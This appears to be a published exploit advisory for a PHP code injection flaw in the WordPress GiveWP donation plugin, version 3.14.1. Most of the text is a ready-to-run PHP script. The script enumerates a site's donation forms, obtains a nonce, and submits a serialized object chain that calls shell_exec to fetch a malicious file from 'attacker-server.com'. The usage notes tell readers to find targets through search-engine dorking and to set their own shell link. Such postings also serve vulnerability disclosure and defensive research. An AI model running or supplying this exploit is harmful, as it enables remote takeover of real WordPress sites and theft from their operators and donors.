Headline
WordPress GiveWP Donation Fundraising Platform 3.14.1 Code Injection
WordPress GiveWP Donation Fundraising Platform version 3.14.1 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) || # Vendor : https://givewp.com/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code Upload shell file from external link.[+] Line 78 set your file link.[+] Line 127. set your target.[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass GiveWPExploit { private $targetUrl; private $headers; public function __construct($targetUrl) { $this->targetUrl = $targetUrl; $this->headers = array( 'Content-Type: application/x-www-form-urlencoded' ); } public function check() { $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array('action' => 'give_form_search')); if (!$response || $response['http_code'] != 200) { echo "Failed to retrieve form list.\n"; return false; } $forms = json_decode($response['body'], true); if (empty($forms)) { echo "No forms found.\n"; return false; } echo "Successfully retrieved form list. Available Form IDs: " . implode(', ', array_column($forms, 'id')) . "\n"; return $forms; } public function exploit() { $forms = $this->check(); if (!$forms) { return; } $selectedForm = $forms[array_rand($forms)]; $validForm = $this->retrieveAndAnalyzeForm($selectedForm['id']); if (!$validForm) { echo "Failed to retrieve a valid form for exploitation.\n"; return; } echo "Using Form ID: " . $validForm['give_form_id'] . " for exploitation.\n"; $this->sendExploitRequest($validForm); } private function retrieveAndAnalyzeForm($formId) { $response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array( 'action' => 'give_donation_form_nonce', 'give_form_id' => $formId )); if (!$response || $response['http_code'] != 200) { return false; } $formData = json_decode($response['body'], true); $giveFormId = $formId; $giveFormHash = $formData['data']; $givePriceId = '0'; // Default price ID $giveAmount = '$10.00'; // Default amount if (!$giveFormHash) { return false; } return array( 'give_form_id' => $giveFormId, 'give_form_hash' => $giveFormHash, 'give_price_id' => $givePriceId, 'give_amount' => $giveAmount ); } private function sendExploitRequest($validForm) { // URL of the malicious file to be fetched $remoteFileUrl = 'http://attacker-server.com/malicious-file.php'; // Payload that uses file_get_contents to fetch the remote file $payload = sprintf( 'O:19:"Stripe\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\Onboarding\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}}}}}}}', strlen($remoteFileUrl), $remoteFileUrl ); $data = array( 'give-form-id' => $validForm['give_form_id'], 'give-form-hash' => $validForm['give_form_hash'], 'give-price-id' => $validForm['give_price_id'], 'give-amount' => $validForm['give_amount'], 'give_first' => 'Test', 'give_last' => 'User', 'give_email' => '[email protected]', 'give_title' => $payload, 'give-gateway' => 'offline', 'action' => 'give_process_donation' ); $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', $data); } private function sendRequest($method, $url, $data) { $options = array( 'http' => array( 'method' => $method, 'header' => implode("\r\n", $this->headers), 'content' => http_build_query($data) ) ); $context = stream_context_create($options); $result = file_get_contents($url, false, $context); if ($result === false) { return false; } return array( 'http_code' => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code 'body' => $result ); }}// Usage$exploit = new GiveWPExploit('http://127.0.0.1');$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================